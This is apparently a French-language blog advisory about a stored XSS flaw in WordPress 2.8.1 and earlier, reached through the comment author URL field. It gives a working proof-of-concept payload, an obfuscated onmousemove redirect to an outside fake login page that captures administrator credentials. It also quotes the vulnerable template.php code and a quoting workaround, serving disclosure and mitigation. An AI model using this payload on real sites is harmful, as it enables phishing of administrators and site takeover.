Vulnerabilité Xss 0-day dans wordpress <= 2.8.1

Une Vulnérabilité 0-day XSS a été trouver sur la dernière version de WordPress <=2.8.1 et précédente par le site chinois huandan.org.elle  concerne le champ SITE dans la partie commentaires , et causé par un dysfonctionnement dans la partie du contrôle du code .

Scénario de l’attaque :

1- On poste un commentaire sur un site on entrant dans le champ site le code suivant :
POC :

http://www.hamza.ma/attaquesmassive/site_marocain’ onmousemove=’location.href=String.fromCharCode(104,116,116,112,58,47,47,104,97,109,122,
97,46,109,97,47,119,112,108,111,103,105,110,46,112,104,112);

2- Sur la partie administration un administrateur survole sans cliquer sur le lien de l’url

wordpress0day

3- il est redirigé automatiquement vers une page d’authentification FAKE ,dans notre exemple : http://www.hamza.ma/wplogin.php

wp-fake-page

4- l’administrateur re-rentre son Login et passe qui est stocké dans un fichier Domaine.txt
5- La page Fake redirige l’utilisateur vers son site .

D’autre scénario peuvent être mis en œuvre : attaques par shell …

Les failles dans le code:
Dans le fichier template.php du dossier \ wp-admin \ includes \ template.php , La variable $author_url n’est pas bien sécurisé

#$author_url = get_comment_author_url();
#
#case 'author':
#
# echo "
"; comment_author(); echo '
';
#
# if ( !emptyempty($author_url) )
#
# echo "a title="$author_url" href='$author_url'>$author_url_display
";

Aucun Patch officiel n’est encore Disponible .

Pour contourner Remplacer La variable ‘$author_url’ par « $author_url«  2 guillemet valent mieux qu’un .

Articles similaires

2 thoughts on “Vulnerabilité Xss 0-day dans wordpress <= 2.8.1

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *